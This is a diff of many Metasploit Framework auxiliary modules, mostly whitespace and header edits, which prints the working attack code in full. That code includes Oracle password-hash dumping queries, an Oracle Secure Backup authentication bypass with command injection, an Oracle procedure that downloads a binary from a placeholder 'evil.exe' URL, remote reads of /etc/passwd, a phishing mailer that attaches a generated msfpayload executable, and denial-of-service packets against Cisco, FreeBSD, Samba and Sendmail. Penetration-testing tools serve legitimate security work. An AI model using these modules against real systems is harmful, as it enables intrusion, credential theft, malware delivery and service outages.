@ -129,7 +133,7 @@ class Metasploit3 < Msf::Auxiliary
print_error("It appears you do not have sufficient rights to perform the check")
end
end
begin
query = %Q|
SELECT limit
@ -146,7 +150,7 @@ class Metasploit3 < Msf::Auxiliary
print_error("It appears you do not have sufficient rights to perform the check")
end
end
begin
query = %Q|
SELECT limit
@ -163,7 +167,7 @@ class Metasploit3 < Msf::Auxiliary
print_error("It appears you do not have sufficient rights to perform the check")
end
end
begin
query = %Q|
SELECT limit
@ -245,7 +249,7 @@ class Metasploit3 < Msf::Auxiliary
if majorrel.join.to_i < 11
query = %Q|
SELECT name, password
SELECT name, password
FROM sys.user$
where password != 'null' and type# = 1 and astatus = 0
|
@ -278,7 +282,7 @@ class Metasploit3 < Msf::Auxiliary
begin
if majorrel.join.to_i < 11
query = %Q|
SELECT username, password
SELECT username, password
FROM dba_users
WHERE account_status = 'EXPIRED & LOCKED'
|

View File

@ -1,3 +1,7 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -15,9 +19,9 @@ class Metasploit3 < Msf::Auxiliary
super(update_info(info,
'Name' => 'Oracle Secure Backup Authentication Bypass/Command Injection Vulnerability',
'Description' => %q{
This module exploits an authentication bypass vulnerability
in login.php in order to execute arbitrary code via a command injection
vulnerability in property_box.php. This module was tested
This module exploits an authentication bypass vulnerability
in login.php in order to execute arbitrary code via a command injection
vulnerability in property_box.php. This module was tested
against Oracle Secure Backup version 10.3.0.1.0 (Win32).
},
'Author' => [ 'MC' ],
@ -44,7 +48,7 @@ class Metasploit3 < Msf::Auxiliary
def run
cmd = datastore['CMD']
res = send_request_cgi(
{
'uri' => '/login.php',
@ -57,7 +61,7 @@ class Metasploit3 < Msf::Auxiliary
sessionid = res.headers['Set-Cookie'].split(';')[0]
print_status("Sending command: #{datastore['CMD']}...")
send_request_cgi(
{
'uri' => '/property_box.php',

View File

@ -1,3 +1,7 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -10,7 +14,7 @@ require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::ORACLE
def initialize(info = {})
super(update_info(info,
'Name' => 'Oracle Java execCommand (Win32)',
@ -26,7 +30,7 @@ class Metasploit3 < Msf::Auxiliary
],
'DisclosureDate' => 'Dec 7 2007'))
register_options(
register_options(
[
OptString.new('CMD', [ false, 'The OS command to execute.', 'echo metasploit > %SYSTEMDRIVE%\\\\unbreakable.txt']),
], self.class)
@ -52,7 +56,7 @@ class Metasploit3 < Msf::Auxiliary
"
procedure = "
create or replace procedure #{name} (p_command in varchar2)
create or replace procedure #{name} (p_command in varchar2)
as language java
name '#{source}.execCommand (java.lang.String)';
"
@ -61,7 +65,7 @@ class Metasploit3 < Msf::Auxiliary
drops = "drop java source #{source}"
dropp = "drop procedure #{name}"
dropp = "drop procedure #{name}"
begin
print_status("Creating java source '#{source}'...")

View File

@ -1,3 +1,7 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -10,7 +14,7 @@ require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::ORACLE
def initialize(info = {})
super(update_info(info,
'Name' => 'Oracle URL Download',
@ -27,7 +31,7 @@ class Metasploit3 < Msf::Auxiliary
],
'DisclosureDate' => 'Feb 2003'))
register_options(
register_options(
[
OptString.new('URL', [ false, 'The URL to download the binary from.', 'http://www.meh.com/evil.exe']),
OptString.new('COPYTO', [ false, 'Location to copy the binary to', 'c:\\meh.exe']),
@ -66,11 +70,11 @@ class Metasploit3 < Msf::Auxiliary
NAME 'FileUpload.fileUpload (java.lang.String, java.lang.String)';
"
exec = "begin PROC_FILEUPLOAD ('#{datastore['COPYTO']}', '#{datastore['URL']}'); end;"
exec = "begin PROC_FILEUPLOAD ('#{datastore['COPYTO']}', '#{datastore['URL']}'); end;"
drops = "drop java source SRC_FILE_UPLOAD"
dropp = "drop procedure PROC_FILEUPLOAD"
dropp = "drop procedure PROC_FILEUPLOAD"
begin
print_status("Creating java source 'SRC_FILE_UPLOAD'...")

View File

@ -1,3 +1,7 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -28,12 +32,12 @@ class Metasploit3 < Msf::Auxiliary
],
'DisclosureDate' => 'Jan 7 2009'))
register_options(
[
Opt::RPORT(1521),
OptString.new('SLEEP', [ false, 'Sleep() amount between each request.', '1']),
OptString.new('SIDFILE', [ false, 'The file that contains a list of sids.', File.join(Msf::Config.install_root, 'data', 'wordlists', 'sid.txt')]),
], self.class)
register_options(
[
Opt::RPORT(1521),
OptString.new('SLEEP', [ false, 'Sleep() amount between each request.', '1']),
OptString.new('SIDFILE', [ false, 'The file that contains a list of sids.', File.join(Msf::Config.install_root, 'data', 'wordlists', 'sid.txt')]),
], self.class)
end
@ -43,9 +47,9 @@ class Metasploit3 < Msf::Auxiliary
list = datastore['SIDFILE']
print_status("Starting brute force on #{rhost}, using sids from #{list}...")
fd = File.open(list).each do |sid|
login = "(DESCRIPTION=(CONNECT_DATA=(SID=#{sid})(CID=(PROGRAM=)(HOST=MSF)(USER=)))(ADDRESS=(PROTOCOL=tcp)(HOST=#{rhost})(PORT=#{rport})))"
pkt = tns_packet(login)

View File

@ -1,3 +1,7 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -24,7 +28,7 @@ class Metasploit3 < Msf::Auxiliary
'Version' => '$Revision$',
'DisclosureDate' => 'Feb 1 2009'))
register_options(
register_options(
[
Opt::RPORT(1521),
OptString.new('CMD', [ false, 'Something like ping, version, status, etc..', '(CONNECT_DATA=(COMMAND=VERSION))']),
@ -42,7 +46,7 @@ class Metasploit3 < Msf::Auxiliary
print_status("Sending '#{command}' to #{rhost}:#{rport}")
sock.put(pkt)
print_status("writing #{pkt.length} bytes.")
sleep(0.5)
print_status("reading")
@ -52,6 +56,6 @@ class Metasploit3 < Msf::Auxiliary
res = res.tr("\177",".")
puts res
disconnect
disconnect
end
end

View File

@ -3,7 +3,7 @@
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -18,7 +18,7 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Pop2
def initialize(info = {})
super(update_info(info,
super(update_info(info,
'Name' => 'UoW pop2d Remote File Retrieval Vulnerability',
'Description' => %q{
This module exploits a vulnerability in the FOLD command of the

View File

@ -15,7 +15,7 @@ require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Postgres
def initialize(info = {})
super(update_info(info,
'Name' => 'PostgreSQL Server Generic Query',
@ -39,7 +39,7 @@ class Metasploit3 < Msf::Auxiliary
OptString.new('RFILE', [ true, 'The remote file', '/etc/passwd'])
], self.class)
deregister_options( 'SQL', 'RETURN_ROWSET' )
deregister_options( 'SQL', 'RETURN_ROWSET' )
end
def rhost
@ -49,7 +49,7 @@ class Metasploit3 < Msf::Auxiliary
def rport
datastore['RPORT']
end
def run
ret = postgres_read_textfile(datastore['RFILE'])
verbose = datastore['VERBOSE']
@ -68,7 +68,7 @@ class Metasploit3 < Msf::Auxiliary
print_error "#{rhost}:#{rport} Postgres - #{ret[:sql_error]}"
end
when :complete
print_good "#{rhost}:#{rport} Postgres - Command complete." if verbose
print_good "#{rhost}:#{rport} Postgres - Command complete." if verbose
end
postgres_logout if self.postgres_conn
end

View File

@ -15,7 +15,7 @@ require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Postgres
def initialize(info = {})
super(update_info(info,
'Name' => 'PostgreSQL Server Generic Query',
@ -32,7 +32,7 @@ class Metasploit3 < Msf::Auxiliary
'Version' => '$Revision$'
))
register_options( [ ], self.class) # None needed.
register_options( [ ], self.class) # None needed.
end
def rhost
@ -42,7 +42,7 @@ class Metasploit3 < Msf::Auxiliary
def rport
datastore['RPORT']
end
def run
ret = postgres_query(datastore['SQL'],datastore['RETURN_ROWSET'])
verbose = datastore['VERBOSE']
@ -52,7 +52,7 @@ class Metasploit3 < Msf::Auxiliary
when :sql_error
print_error "#{rhost}:#{rport} Postgres - #{ret[:sql_error]}"
when :complete
print_good "#{rhost}:#{rport} Postgres - Command complete." if verbose
print_good "#{rhost}:#{rport} Postgres - Command complete." if verbose
end
postgres_logout if self.postgres_conn
end

View File

@ -3,7 +3,7 @@
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -19,7 +19,7 @@ class Metasploit3 < Msf::Auxiliary
include Rex::Platforms::Windows
def initialize(info = {})
super(update_info(info,
super(update_info(info,
'Name' => 'TrendMicro ServerProtect File Access',
'Description' => %q{
This modules exploits a remote file access flaw in the ServerProtect Windows
@ -47,25 +47,23 @@ class Metasploit3 < Msf::Auxiliary
[ 'list' ]
]
))
register_options(
[
Opt::RPORT(5168),
OptString.new('RPATH',
[
false,
"The remote filesystem path",
nil
]
),
OptString.new('LPATH',
[
false,
"The local filesystem path",
nil
]
),
], self.class)
register_options(
[
Opt::RPORT(5168),
OptString.new('RPATH',
[
false,
"The remote filesystem path",
nil
]),
OptString.new('LPATH',
[
false,
"The local filesystem path",
nil
]),
], self.class)
end
def check_option(name)
@ -73,9 +71,9 @@ class Metasploit3 < Msf::Auxiliary
raise RuntimeError, "The #{name} parameter is required by this option"
end
end
def auxiliary_commands
{
{
"delete" => "Delete a file",
"download" => "Download a file",
"upload" => "Upload a file",
@ -92,15 +90,15 @@ class Metasploit3 < Msf::Auxiliary
when 'upload'
check_option('RPATH')
check_option('LPATH')
cmd_upload(datastore['RPATH'], datastore['LPATH'])
cmd_upload(datastore['RPATH'], datastore['LPATH'])
when 'delete'
check_option('RPATH')
cmd_delete(datastore['RPATH'])
cmd_delete(datastore['RPATH'])
when 'list'
check_option('RPATH')
cmd_list(datastore['RPATH'])
else
print_error("Unknown action #{action.name}")
print_error("Unknown action #{action.name}")
end
end
@ -110,9 +108,9 @@ class Metasploit3 < Msf::Auxiliary
#
# Once this function is used, if cmd_download or cmd_upload is called the server will crash :/
#
#
def cmd_list(*args)
if (args.length < 1)
print_status("Usage: list folder")
return
@ -126,7 +124,7 @@ class Metasploit3 < Msf::Auxiliary
# FindFirstFile
resp = serverprotect_rpccmd(131080, data, 0x100)
return if not resp
if resp.length != 0x108
print_status("An unknown error occured while calling FindFirstFile.")
return
@ -143,7 +141,7 @@ class Metasploit3 < Msf::Auxiliary
file = deunicode(resp[0x30, 0xd0])
print("#{file}\n")
data = "\0" * 0x100
data[0,4] = [handle].pack('V')
@ -151,7 +149,7 @@ class Metasploit3 < Msf::Auxiliary
# FindNextFile
resp = serverprotect_rpccmd(131081, data, 0x100)
return if not resp
if resp.length != 0x108
print_status("An unknown error occured while calling FindFirstFile.")
break
@ -174,7 +172,7 @@ class Metasploit3 < Msf::Auxiliary
def cmd_delete(*args)
if (args.length == 0)
print_status("Usage: delete c:\\windows\\system.ini")
return
@ -183,7 +181,7 @@ class Metasploit3 < Msf::Auxiliary
data = Rex::Text.to_unicode(args[0]+"\0")
resp = serverprotect_rpccmd(131077, data, 4)
return if not resp
if (resp.length == 12)
ret, = resp[8,4].unpack('V')
@ -198,12 +196,12 @@ class Metasploit3 < Msf::Auxiliary
def cmd_download(*args)
if (args.length < 2)
print_status("Usage: download remote_file local_file")
return
end
# GENERIC_READ: 0x80000000
# FILE_SHARE_READ: 1
# OPEN_EXISTING: 3
@ -231,7 +229,7 @@ class Metasploit3 < Msf::Auxiliary
def cmd_upload(*args)
if (args.length < 2)
print_status("Usage: upload local_file remote_file")
return
@ -271,7 +269,7 @@ class Metasploit3 < Msf::Auxiliary
resp = serverprotect_rpccmd(131073, data, 540)
return if not resp
if (resp.length < 548)
print_status("An unknown error occurred while calling CreateFile.")
return 0
@ -363,7 +361,7 @@ class Metasploit3 < Msf::Auxiliary
padding = ""
end
stub =
stub =
NDR.long(cmd) +
NDR.long(data.length) +
data +
@ -373,14 +371,14 @@ class Metasploit3 < Msf::Auxiliary
return serverprotect_rpc_call(0, stub)
end
#
# Call the serverprotect RPC service
#
#
def serverprotect_rpc_call(opnum, data = '')
begin
connect
handle = dcerpc_handle(
@ -400,7 +398,7 @@ class Metasploit3 < Msf::Auxiliary
disconnect
outp
rescue ::Interrupt
raise $!
rescue ::Exception => e
@ -408,5 +406,5 @@ class Metasploit3 < Msf::Auxiliary
nil
end
end
end

View File

@ -1,3 +1,7 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -33,7 +37,7 @@ class Metasploit3 < Msf::Auxiliary
],
'DisclosureDate' => 'Apr 28 2009'))
register_options(
register_options(
[
Opt::RPORT(12174),
OptString.new('CMD', [ false, 'The OS command to execute', 'cmd /c echo metasploit > %SYSTEMDRIVE%\metasploit.txt']),
@ -44,19 +48,19 @@ class Metasploit3 < Msf::Auxiliary
begin
connect
len = 2 + datastore['CMD'].length
len = 2 + datastore['CMD'].length
data = [0x00000000].pack('V')
data << len.chr
data << "\x00"
data << datastore['CMD'] + " "
data << "\x00"
print_status("Sending command: #{datastore['CMD']}")
print_status("Sending command: #{datastore['CMD']}")
sock.put(data)
res = sock.get_once
if (!res)
print_error("Did not recieve data. Failed?")
else

View File

@ -1,6 +1,9 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -23,7 +26,7 @@ class Metasploit3 < Msf::Auxiliary
'Name' => 'Generic Emailer (SMTP)',
'Description' => %q{
This module can be used to automate email delivery.
This code is based on Joshua Abraham's email script for social
This code is based on Joshua Abraham's email script for social
engineering.
},
'License' => MSF_LICENSE,
@ -31,26 +34,26 @@ class Metasploit3 < Msf::Auxiliary
'References' =>
[
[ 'URL', 'http://spl0it.org/' ],
],
],
'Author' => [ 'et <et[at]metasploit.com>' ]))
register_options(
[
[
OptString.new('RHOST', [true, "SMTP server address",'127.0.0.1']),
OptString.new('RPORT', [true, "SMTP server port",'25']),
OptString.new('YAML_CONFIG', [true, "Full path to YAML Configuration file",File.join(Msf::Config.install_root, "data","emailer_config.yaml")]),
], self.class)
# Hide this option from the user
], self.class)
# Hide this option from the user
deregister_options('MAILTO')
end
def run
fileconf = File.open(datastore['YAML_CONFIG'])
yamlconf = YAML::load(fileconf)
fileto = yamlconf['to']
yamlconf = YAML::load(fileconf)
fileto = yamlconf['to']
from = yamlconf['from']
subject = yamlconf['subject']
type = yamlconf['type']
@ -63,7 +66,7 @@ class Metasploit3 < Msf::Auxiliary
attachment_file = yamlconf['attachment_file']
attachment_file_type = yamlconf['attachment_file_type']
attachment_file_name = yamlconf['attachment_file_name']
### payload options ###
make_payload = yamlconf['make_payload']
zip_payload = yamlconf['zip_payload']
@ -77,35 +80,35 @@ class Metasploit3 < Msf::Auxiliary
datastore['MAILFROM'] = from
msg = File.open(msg_file).read
email_sig = File.open(sig_file).read
if (type !~ /text/i and type !~ /text\/html/i)
if (type !~ /text/i and type !~ /text\/html/i)
print_error("YAML config: #{type}")
end
if make_payload
if make_payload
print_status("Creating payload...")
system(
"#{msf_location}/msfpayload #{msf_payload} LHOST=#{msf_ip} LPORT=#{msf_port} R | #{msf_location}/msfencode -t exe -o /tmp/#{msf_filename} > /dev/null 2>&1")
if msf_change_ext
if msf_change_ext
msf_payload_newext = msf_filename
msf_payload_newext = msf_payload_newext.sub(/\.\w+$/, ".#{msf_payload_ext}")
File.rename("/tmp/#{msf_filename}", "/tmp/#{msf_payload_newext}")
msf_filename = msf_payload_newext
end
if zip_payload
if zip_payload
zip_file = msf_filename
zip_file = zip_file.gsub(/\.\w+/, '.zip')
system("zip -r /tmp/#{zip_file} /tmp/#{msf_filename} > /dev/null 2>&1");
msf_filename = zip_file
attachment_file_type = 'application/zip'
else
else
attachment_file_type = 'application/exe'
end
@ -118,17 +121,17 @@ class Metasploit3 < Msf::Auxiliary
if l !~ /\@/
nil
end
nem = l.split(',')
name = nem[0].split(' ')
fname = name[0]
lname = name[1]
email = nem[1]
if add_name
email_msg_body = "#{fname},\n\n#{msg}"
else
if add_name
email_msg_body = "#{fname},\n\n#{msg}"
else
email_msg_body = msg
end
@ -136,7 +139,7 @@ class Metasploit3 < Msf::Auxiliary
data_sig = File.open(sig_file).read
email_msg_body = "#{email_msg_body}\n#{data_sig}"
end
print_status("Emailing #{name[0]} #{name[1]} at #{email}")
mime_msg = Rex::MIME::Message.new
@ -146,22 +149,20 @@ class Metasploit3 < Msf::Auxiliary
mime_msg.to = email
datastore['MAILTO'] = email.strip
mime_msg.subject = subject
mime_msg.add_part(Rex::Text.encode_base64(email_msg_body, "\r\n"), type, "base64", "inline")
if attachment
if attachment_file_name
data_attachment = File.open(attachment_file).read
mime_msg.add_part(Rex::Text.encode_base64(data_attachment, "\r\n"), attachment_file_type, "base64", "attachment; filename=\"#{attachment_file_name}\"")
end
end
send_message(mime_msg.to_s)
sleep wait
sleep wait
end
print_status("Email sent..")
end
end
end

View File

@ -3,7 +3,7 @@
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -17,12 +17,12 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
super(update_info(info,
'Name' => 'Cisco IOS HTTP GET /%% request Denial of Service',
'Description' => %q{
This module triggers a Denial of Service condition in the Cisco IOS
This module triggers a Denial of Service condition in the Cisco IOS
HTTP server. By sending a GET request for "/%%", the device becomes
unresponsive. IOS 11.1 -> 12.1 are reportedly vulnerable. This module
tested successfully against a Cisco 1600 Router IOS v11.2(18)P.
@ -43,7 +43,7 @@ class Metasploit3 < Msf::Auxiliary
[
Opt::RPORT(80),
], self.class)
end
def run

View File

@ -3,7 +3,7 @@
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -17,12 +17,12 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
super(update_info(info,
'Name' => 'FreeBSD Remote NFS RPC Request Denial of Service',
'Description' => %q{
This module sends a specially-crafted NFS Mount request causing a
This module sends a specially-crafted NFS Mount request causing a
kernel panic on host running FreeBSD 6.0.
},
'Author' => [ 'MC' ],
@ -35,7 +35,7 @@ class Metasploit3 < Msf::Auxiliary
[ 'OSVDB', '23511' ],
[ 'CVE', '2006-0900' ],
]))
register_options([Opt::RPORT(2049),], self.class)
end
@ -45,11 +45,11 @@ class Metasploit3 < Msf::Auxiliary
pkt = "\x80\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x02"
pkt << "\x00\x01\x86\xa5\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x00"
pkt << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04"
print_status("Sending dos packet...")
sock.put(pkt)
disconnect
end

View File

@ -3,7 +3,7 @@
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -19,7 +19,7 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
super(update_info(info,
'Name' => '3Com SuperStack Switch Denial of Service',
'Description' => %q{
This module causes a temporary denial of service condition
@ -40,7 +40,7 @@ class Metasploit3 < Msf::Auxiliary
[ 'URL', 'http://support.3com.com/infodeli/tools/switches/dna1695-0aaa17.pdf' ],
],
'DisclosureDate' => 'Jun 24 2004'))
register_options( [ Opt::RPORT(80) ], self.class )
end
@ -60,7 +60,7 @@ class Metasploit3 < Msf::Auxiliary
rescue ::Errno::ECONNRESET
print_status("DoS packet successful. #{rhost} not responding.")
end
end
end
end

View File

@ -15,27 +15,27 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
super(update_info(info,
'Name' => 'Apache mod_isapi <= 2.2.14 Dangling Pointer',
'Description' => %q{
This module triggers a use-after-free vulnerability in the Apache Software
Foundation mod_isapi extension. In order to reach the vulnerable code, the
Foundation mod_isapi extension. In order to reach the vulnerable code, the
target server must have an ISAPI module installed and configured.
By making a request that terminates abnormally (either an aborted TCP connection or
an unsatisfied chunked request), mod_isapi will unload the ISAPI extension. Later,
if another request comes for that ISAPI module, previously obtained pointers will
if another request comes for that ISAPI module, previously obtained pointers will
be used resulting in an access violation or potentially arbitrary code execution.
Although arbitrary code execution is theoretically possible, a real-world method of
Although arbitrary code execution is theoretically possible, a real-world method of
invoking this consequence has not been proven. In order to do so, one would need to
find a situation where a particular ISAPI module loads at an image base address
that can be re-allocated by a remote attacker.
Limited success was encountered using two separate ISAPI modules. In this scenario,
a second ISAPI module was loaded into the same memory area as the previously
a second ISAPI module was loaded into the same memory area as the previously
unloaded module.
},
'Author' =>

View File

@ -3,7 +3,7 @@
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -19,10 +19,10 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
super(update_info(info,
'Name' => 'Dell OpenManage POST Request Heap Overflow (win32)',
'Description' => %q{
This module exploits a heap overflow in the Dell OpenManage
This module exploits a heap overflow in the Dell OpenManage
Web Server (omws32.exe), versions 3.2-3.7.1. The vulnerability
exists due to a boundary error within the handling of POST requests,
where the application input is set to an overly long file name.
@ -40,7 +40,7 @@ class Metasploit3 < Msf::Auxiliary
[ 'CVE', '2004-0331' ],
],
'DisclosureDate' => 'Feb 26 2004'))
register_options(
[
Opt::RPORT(1311),
@ -63,4 +63,4 @@ class Metasploit3 < Msf::Auxiliary
disconnect
end
end
end

View File

@ -3,10 +3,10 @@
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
# http://metasploit.com/framework/
##
require 'msf/core'
@ -15,9 +15,9 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
super(update_info(info,
'Name' => 'Ruby WEBrick::HTTP::DefaultFileHandler DoS',
'Description' => %q{
The WEBrick::HTTP::DefaultFileHandler in WEBrick in
@ -56,7 +56,7 @@ class Metasploit3 < Msf::Auxiliary
print_status("Request sent to #{rhost}:#{rport}")
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
print_status("Couldn't connect to #{rhost}:#{rport}")
rescue ::Timeout::Error, ::Errno::EPIPE
rescue ::Timeout::Error, ::Errno::EPIPE
end
end
end

View File

@ -3,7 +3,7 @@
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -27,9 +27,9 @@ class Metasploit3 < Msf::Auxiliary
'Author' => 'kris katterjohn',
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' => [
'References' => [
[ 'CVE', '2008-5081' ],
[ 'OSVDB', '50929' ],
[ 'OSVDB', '50929' ],
],
'DisclosureDate' => 'Nov 14 2008')
@ -54,7 +54,7 @@ class Metasploit3 < Msf::Auxiliary
n.l3.id = 0xbeef
n.l3.ttl = 128
n.l3.flags = 2
n.l4 = Racket::L4::UDP.new
n.l4.src_port = 0
n.l4.dst_port = datastore['RPORT'].to_i

View File

@ -3,7 +3,7 @@
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -17,10 +17,10 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::DCERPC
include Msf::Exploit::Remote::SMB
include Msf::Auxiliary::Dos
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
super(update_info(info,
'Name' => 'Samba lsa_io_privilege_set Heap Overflow',
'Description' => %q{
This module triggers a heap overflow in the LSA RPC service
@ -35,18 +35,18 @@ class Metasploit3 < Msf::Auxiliary
['OSVDB', '34699'],
]
))
register_options(
[
OptString.new('SMBPIPE', [ true, "The pipe name to use", 'LSARPC']),
], self.class)
end
def run
pipe = datastore['SMBPIPE'].downcase
print_status("Connecting to the SMB service...")
connect()
smb_login()
@ -61,13 +61,13 @@ class Metasploit3 < Msf::Auxiliary
# Linux: Needs heap magic to work around glibc (or TALLOC mode for 3.0.20+)
# Mac OS X: PC control via memcpy to stack ptr
# Solaris: PC control via memcpy to stack ptr
stub = lsa_open_policy(dcerpc)
stub << NDR.long(1)
stub << NDR.long(0xffffffff)
stub << NDR.long(0x100)
stub << "X" * 0x100
print_status("Calling the vulnerable function...")
begin
@ -82,8 +82,8 @@ class Metasploit3 < Msf::Auxiliary
raise e
end
end
disconnect
disconnect
end
end

View File

@ -3,7 +3,7 @@
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -17,10 +17,10 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::DCERPC
include Msf::Exploit::Remote::SMB
include Msf::Auxiliary::Dos
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
super(update_info(info,
'Name' => 'Samba lsa_io_trans_names Heap Overflow',
'Description' => %q{
This module triggers a heap overflow in the LSA RPC service
@ -35,18 +35,18 @@ class Metasploit3 < Msf::Auxiliary
['OSVDB', '34699'],
]
))
register_options(
[
OptString.new('SMBPIPE', [ true, "The pipe name to use", 'LSARPC']),
], self.class)
end
def run
pipe = datastore['SMBPIPE'].downcase
print_status("Connecting to the SMB service...")
connect()
smb_login()
@ -82,10 +82,10 @@ class Metasploit3 < Msf::Auxiliary
raise e
end
end
dcerpc.call(0x0f, stub)
disconnect
disconnect
end
end

View File

@ -3,7 +3,7 @@
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -18,7 +18,7 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
super(update_info(info,
'Name' => 'Sendmail SMTP Address prescan <= 8.12.8 Memory Corruption',
'Description' => %q{
This is a proof of concept denial of service module for Sendmail versions

View File

@ -3,7 +3,7 @@
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -17,9 +17,9 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
super(update_info(info,
'Name' => 'Solaris LPD Arbitrary File Delete',
'Description' => %q{
This module uses a vulnerability in the Solaris line printer
@ -27,7 +27,7 @@ class Metasploit3 < Msf::Auxiliary
can be used to exploit the rpc.walld format string flaw, the
missing krb5.conf authentication bypass, or simply delete
system files. Tested on Solaris 2.6, 7, 8, 9, and 10.
},
'Author' => [ 'hdm', 'Optyx <optyx@uberhax0r.net>' ],
'License' => MSF_LICENSE,
@ -40,7 +40,7 @@ class Metasploit3 < Msf::Auxiliary
[ 'URL', 'http://sunsolve.sun.com/search/document.do?assetkey=1-26-101842-1'],
]
))
register_options(
[
Opt::RPORT(515),
@ -49,21 +49,21 @@ class Metasploit3 < Msf::Auxiliary
end
def run
r_hostname = Rex::Text.rand_text_alpha(rand(8)+1)
r_user = Rex::Text.rand_text_alpha(rand(8)+1)
r_spool = Rex::Text.rand_text_alpha(rand(8)+1)
# Create a simple control file...
control = "H#{r_hostname}\nP#{r_user}\n";
# The job ID is squashed down to three decimal digits
jid = ($$ % 1000).to_s + [Time.now.to_i].pack('N').unpack('H*')[0]
# Establish the first connection to the server
sock1 = connect(false)
# Request a cascaded job
sock1.put("\x02#{r_hostname}:#{r_spool}\n")
res = sock1.get_once
@ -71,7 +71,7 @@ class Metasploit3 < Msf::Auxiliary
print_status("The target did not accept our job request command")
return
end
# Theoretically, we could delete multiple files at once, however
# the lp daemon will append garbage from memory to the path name
# if we don't stick a null byte after the path. Unfortunately, this
